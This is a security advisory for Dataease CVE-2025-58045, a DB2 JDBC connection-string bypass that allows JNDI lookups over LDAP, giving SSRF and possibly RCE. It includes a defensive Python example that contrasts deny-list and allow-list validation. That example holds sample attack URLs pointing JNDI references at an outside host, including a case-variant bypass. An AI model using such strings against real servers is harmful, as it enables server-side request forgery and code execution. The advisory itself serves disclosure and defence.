Dataease · Dataease · CVE-2025-58045
**Name of the Vulnerable Software and Affected Versions**
Dataease versions up to and including 2.10.12
**Description**
Dataease is an open source data analytics and visualization platform. A patch intended to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the `rmi` parameter; the `ldap` parameter in the DB2 JDBC connection string was not filtered. An attacker who controls a DB2 JDBC connection string can therefore still make the server perform a JNDI lookup against an attacker-chosen LDAP host, which is a server-side request forgery (SSRF). Recent JDK releases refuse by default to deserialize Java objects returned in LDAP responses (the `com.sun.jndi.ldap.object.trustSerialData` property defaults to false), which closes the remote code execution path; the outbound connection is still made, so SSRF remains exploitable regardless of JDK version, and deployments on older JDKs that still trust serialized data from LDAP should assume the RCE path is open as well. The underlying weakness is a deny-list on one token rather than an allow-list of the connection-string properties the application actually needs.
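To make the failure mode concrete, the following is an added Python example, not Dataease's own code (the advisory does not show the actual check). It contrasts a deny-list on the connection string, which the `ldap` variant walks straight past, with an allow-list of DB2 JCC properties. The JNDI-bearing property name `clientRerouteServerListJNDIName`, the host names and the set of allowed properties are assumptions chosen for illustration.

```python
# Added illustration (not Dataease code): deny-list vs. allow-list validation
# of a DB2 JCC connection string.
# DB2 JCC URL syntax: jdbc:db2://host[:port]/database[:prop=value;...]

# Constructed sample URLs. The JNDI-bearing property name and the hosts are
# assumptions made for this example, not details taken from the advisory.
BENIGN = "jdbc:db2://db2.internal:50000/sales:user=report;password=s3cret;sslConnection=true;"
ATTACK_RMI = "jdbc:db2://db2.internal:50000/sales:clientRerouteServerListJNDIName=rmi://203.0.113.10:1099/x;"
ATTACK_LDAP = "jdbc:db2://db2.internal:50000/sales:clientRerouteServerListJNDIName=ldap://203.0.113.10:1389/x;"
# Same reference with the scheme upper-cased: shows the substring check is
# case-sensitive; whether a lookup honours this spelling is a separate question.
ATTACK_RMI_UPPER = ATTACK_RMI.replace("rmi://", "RMI://")


def is_safe_denylist(url: str) -> bool:
    """Stand-in for the bypassed patch: reject only one known-bad token."""
    return "rmi" not in url


# Properties this hypothetical application actually needs (an assumption).
ALLOWED_PROPS = {"user", "password", "sslConnection", "currentSchema"}


def parse_db2_properties(url: str) -> dict:
    """Split a DB2 JCC URL into its trailing property list.

    Raises ValueError on anything that is not a well-formed DB2 URL, so the
    caller fails closed instead of letting an unparsed string through.
    """
    prefix = "jdbc:db2://"
    if not url.lower().startswith(prefix):
        raise ValueError("not a DB2 JDBC URL")
    _hostport, sep, tail = url[len(prefix):].partition("/")
    if not sep:
        raise ValueError("missing database name")
    _database, _sep, props = tail.partition(":")
    result = {}
    for item in filter(None, props.split(";")):
        name, eq, value = item.partition("=")
        if not eq or not name:
            raise ValueError(f"malformed property: {item!r}")
        result[name] = value
    return result


def is_safe_allowlist(url: str) -> bool:
    """Accept a URL only if every property is one the application needs and
    no value carries a scheme://... reference."""
    try:
        props = parse_db2_properties(url)
    except ValueError:
        return False
    for name, value in props.items():
        if name not in ALLOWED_PROPS:
            return False  # e.g. the JNDI-bearing property, whatever its value
        if "://" in value:
            return False  # defence in depth against lookup-style values
    return True


if __name__ == "__main__":
    samples = [("benign", BENIGN), ("rmi", ATTACK_RMI),
               ("ldap", ATTACK_LDAP), ("RMI", ATTACK_RMI_UPPER)]
    for label, url in samples:
        print(f"{label:7} denylist={is_safe_denylist(url)!s:5} "
              f"allowlist={is_safe_allowlist(url)}")
```

The deny-list passes the `ldap` URL and the upper-cased `rmi` URL, exactly the class of bypass described above; the allow-list rejects both because the property name is not one the application needs, independent of which scheme the value names.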
**Recommendations**
Update to version 2.10.13 or later.